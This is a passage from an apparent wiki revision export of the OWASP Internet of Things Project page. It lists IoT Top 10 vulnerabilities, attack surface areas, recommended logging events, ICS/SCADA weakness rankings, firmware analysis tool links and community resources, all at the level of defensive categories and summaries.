* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246179OWASP Internet of Things Project2018-12-19T23:27:54Z<p>Aaron.guzman: /* Classifications */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
[[File:2018 IoT Top10.png|center|thumb|1290x1290px]]<br />
<br />
==OWASP Internet of Things (IoT) Project==<br />
<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
